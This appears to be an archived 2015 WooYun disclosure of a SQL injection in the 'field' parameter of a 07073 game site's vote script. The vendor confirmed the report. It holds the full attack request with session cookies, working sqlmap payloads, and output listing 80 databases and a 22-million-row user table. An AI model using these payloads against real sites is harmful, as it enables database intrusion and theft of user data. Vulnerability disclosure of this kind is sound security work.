乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-18: 细节已通知厂商并且等待厂商处理中 2015-03-18: 厂商已经确认,细节仅向厂商公开 2015-03-28: 细节向核心白帽子及相关领域专家公开 2015-04-07: 细节向普通白帽子公开 2015-04-17: 细节向实习白帽子公开 2015-05-02: 细节向公众公开
07073游戏某站SQL注入第三次影响22042115用户数据无论认不认识我的人都知道,我从不乱脱人家裤子 话说你们用户增长速度挺快的呀这次可不用延时慢慢跑,这次速度杠杠滴
xin.07073.com
POST /plus/xinyou/dbvote.php HTTP/1.1Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 NetsparkerAccept: application/json, text/javascript, */*; q=0.01Origin: http://xin.07073.comReferer: http://xin.07073.com/jingsu/1070711.htmlX-Requested-With: XMLHttpRequestAccept-Language: en-us,en;q=0.5X-Scanner: NetsparkerHost: xin.07073.comCookie: Vote_83=83; Vote_82=82; Vote_78=78; Vote_80=80; Vote_81=81; DEDE_VOTENAME_AAA_83=1; DEDE_VOTENAME_AAA_82=1; DEDE_VOTENAME_AAA_78=1; DEDE_VOTENAME_AAA_80=1; DEDE_VOTENAME_AAA_81=1; CNZZDATA30095910=cnzz_eid%3D1437763485-1426487774-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426660667; CNZZDATA30078424=cnzz_eid%3D1529681690-1426490357-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426658832; DedeUserID=22166706; DedeUserID__ckMd5=195d5f4d055945af; DedeUsername=bma123; DedeUsername__ckMd5=ed597bcceffae423; loginState=1; loginName=bma123; www07073=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22dd2dc1c1fda7746aa70125029bbfeecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22183.57.47.59%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A36.0%29+Gecko%2F20100101+Firefox%2F36.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426664118%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dd671b910f5f2639f02ce1cc826b1db3f; PHPSESSID=c1d84f440efc45df68df03edd0d78e01; TosoDiggID4464fee0fec20fd7f58de87f7ee96950=1; TosoDiggID4464fee0fec20fd7f58de87f7ee96950__ckMd5=bfee8899ae6851e8; TosoDiggIDb6dd734d69aa9f7266b5678c8db1743e=1; TosoDiggIDb6dd734d69aa9f7266b5678c8db1743e__ckMd5=bfee8899ae6851e8; TosoDiggIDf2872b5d007c756a3288e2f29c27768d=1; TosoDiggIDf2872b5d007c756a3288e2f29c27768d__ckMd5=bfee8899ae6851e8; TosoDiggID96291ddc67d0dae5771856131730259b=1; TosoDiggID96291ddc67d0dae5771856131730259b__ckMd5=bfee8899ae6851e8; TosoDiggID541fb77c001f812da4d251f8d42f3b5b=1; TosoDiggID541fb77c001f812da4d251f8d42f3b5b__ckMd5=bfee8899ae6851e8; TosoDiggIDc723360b1b1a6624c0bda36a46423d6a=1; TosoDiggIDc723360b1b1a6624c0bda36a46423d6a__ckMd5=bfee8899ae6851e8; TosoDiggID2c44d13d392d469bac2f65280f4a639e=1; TosoDiggID2c44d13d392d469bac2f65280f4a639e__ckMd5=bfee8899ae6851e8; TosoDiggIDff3af9de5ce2074c0effe3a95a0e655e=1; TosoDiggIDff3af9de5ce2074c0effe3a95a0e655e__ckMd5=bfee8899ae6851e8; TosoDiggID9a9f466501dd2527465077bcf0896ce0=1; TosoDiggID9a9f466501dd2527465077bcf0896ce0__ckMd5=bfee8899ae6851e8; TosoDiggIDc04cab8cdd56aacf2bf1d3b4bd883933=1; TosoDiggIDc04cab8cdd56aacf2bf1d3b4bd883933__ckMd5=bfee8899ae6851e8Accept-Encoding: gzip, deflateContent-Length: 167Content-Type: application/x-www-form-urlencoded; charset=UTF-8ty=left&field=1&aid=1070711
参数:field
field[16:10:11] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.0[16:10:11] [INFO] fetching current user[16:10:11] [INFO] retrieved: amdbuser@%current user: 'amdbuser@%'available databases [80]:[*] 123_07073[*] acg073[*] adv07073[*] advertising[*] android07073[*] askdata[*] atlas07073[*] baidu_xml_dev[*] baobei[*] bar07073[*] bbs073[*] bl07073[*] box07073[*] cache07073[*] cartoon[*] coderead[*] comment[*] datacenter[*] db07073[*] db07073_tx2[*] db07073qn[*] dbcache[*] discuz[*] dn07073[*] dnf07073[*] downloads[*] duandi[*] fahao073[*] fahao10[*] flash07073[*] giftcode[*] hdtemplates[*] hi07073[*] huodong[*] information_schema[*] iphonewy_x15[*] iphonewy_x20[*] jft073[*] kaifuopen_hzhks[*] kaifuopen_zjgtqxx[*] kc07073[*] kf07073[*] kf07073b[*] kf207073[*] kf521[*] kf77745[*] list07073[*] mesearch[*] mh073[*] mobilenews[*] molihai073[*] monitor[*] mysql[*] nycc[*] other_website[*] paihang07073[*] performance_schema[*] shop073[*] sy07073[*] team07073[*] tieba[*] tongji[*] top2011[*] tweibo[*] ui073[*] wap07073[*] webbox[*] weixin073[*] wenwen073[*] wow07073[*] www.13cr.com[*] www07073[*] www07073bak[*] xuan-astd[*] xweibo[*] youxi[*] yxdata[*] zhuanchu[*] zhuanchu2[*] zt07073sts:---Parameter: field (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ty=left&field=1 AND 1811=1811&aid=1070711 Type: inline query Title: MySQL inline queries Payload: ty=left&field=(SELECT CONCAT(0x7171787171,(SELECT (ELT(3754=3754,1))),0x7178786a71))&aid=1070711---[16:12:15] [INFO] testing MySQL[16:12:15] [INFO] confirming MySQL[16:12:15] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.0[16:12:15] [INFO] retrieved: 22042115Database: bbs073+------------+---------+| Table | Entries |+------------+---------+| uc_members | 22042115 |+------------+---------+
危害等级:高
漏洞Rank:20
确认时间:2015-03-18 16:25
感谢提供漏洞信息。
暂无